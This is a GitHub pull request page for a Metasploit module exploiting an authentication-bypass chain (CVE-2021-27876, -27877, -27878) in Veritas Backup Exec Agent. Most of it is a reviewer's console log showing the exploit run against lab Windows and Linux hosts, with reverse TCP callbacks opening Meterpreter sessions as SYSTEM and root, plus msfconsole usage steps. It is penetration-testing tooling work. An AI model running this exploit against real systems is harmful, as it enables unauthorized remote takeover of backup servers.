-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Veritas Backup Exec Agent Authentication Bypass RCE #17012
Conversation
Co-authored-by: dwelch-r7 <Dean_Welch@rapid7.com>
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
@c0rs, thanks for the awesome contribution. I tested on windows and linux installs and they both worked without any issues 👍 Just a couple small suggestions. If you do accept some of the suggestions you'll have to update the console output in the Scenarios section of the documentation. Other than that I think this is good to ship.
Windows:
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 192.168.123.147
rhosts => 192.168.123.147
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.147:10000 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.123.147:10000 - Checking vulnerability
[*] 192.168.123.147:10000 - Connecting to BE Agent service
[*] 192.168.123.147:10000 - Getting supported authentication types
[*] 192.168.123.147:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
[*] 192.168.123.147:10000 - BE agent revision: 9.3
[+] 192.168.123.147:10000 - The target appears to be vulnerable. SHA authentication is enabled
[*] 192.168.123.147:10000 - Exploiting ...
[*] 192.168.123.147:10000 - Connecting to BE Agent service
[*] 192.168.123.147:10000 - Enabling TLS for NDMP connection
[*] 192.168.123.147:10000 - Passing SHA authentication
[*] 192.168.123.147:10000 - Uploading payload with NDMP_FILE_WRITE packet
[*] Sending stage (175686 bytes) to 192.168.123.147
[*] Meterpreter session 5 opened (192.168.123.1:4444 -> 192.168.123.147:49835) at 2022-09-22 15:23:19 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-BE1QFC9
OS : Windows 10 (10.0 Build 19041).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.123.147 - Meterpreter session 5 closed. Reason: User exit
Linux:
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.199.133
rhosts => 172.16.199.133
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set target 1
target => 1
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > reload
[*] Reloading module...
run
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] 172.16.199.133:10000 - Running automatic check ("set AutoCheck false" to disable)
[*] 172.16.199.133:10000 - Checking vulnerability
[*] 172.16.199.133:10000 - Connecting to BE Agent service
[*] 172.16.199.133:10000 - Getting supported authentication types
[*] 172.16.199.133:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5)
[*] 172.16.199.133:10000 - BE agent revision: 9.3
[+] 172.16.199.133:10000 - The target appears to be vulnerable. SHA authentication is enabled
[*] 172.16.199.133:10000 - Exploiting ...
[*] 172.16.199.133:10000 - Connecting to BE Agent service
[*] 172.16.199.133:10000 - Enabling TLS for NDMP connection
[*] 172.16.199.133:10000 - Passing SHA authentication
[*] 172.16.199.133:10000 - Uploading payload with CmdStager
[*] 172.16.199.133:10000 - Command Stager progress - 44.15% done (362/820 bytes)
[*] Sending stage (3020772 bytes) to 172.16.199.133
[*] 172.16.199.133:10000 - Command Stager progress - 100.00% done (820/820 bytes)
[*] Meterpreter session 4 opened (172.16.199.1:4444 -> 172.16.199.133:55062) at 2022-09-22 15:17:01 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfop
[-] Unknown command: sysinfop
meterpreter > sysinfo
Computer : debian.test.com
OS : Debian 9.13 (Linux 4.9.0-19-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > Interrupt: use the 'exit' command to quit
meterpreter > exit
[*] Shutting down Meterpreter...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Release NotesThis module exploits a chain of the vulnerabilities CVE-2021-27876, CVE-2021-27877 and CVE-2021-27878 in Veritas Backup Exec Agent which leads to remote code execution with privileges of system or root user |
Add Veritas Backup Exec Agent Remote Code Execution exploit.
Verification
List the steps needed to make sure this thing works
msfconsole
use exploit/multi/veritas/beagent_sha_auth_rce
set RHOSTS <TARGET_IP>
set TARGET <OS_NAME>
set PAYLOAD <PAYLOAD_NAME>
exploit
Scenarios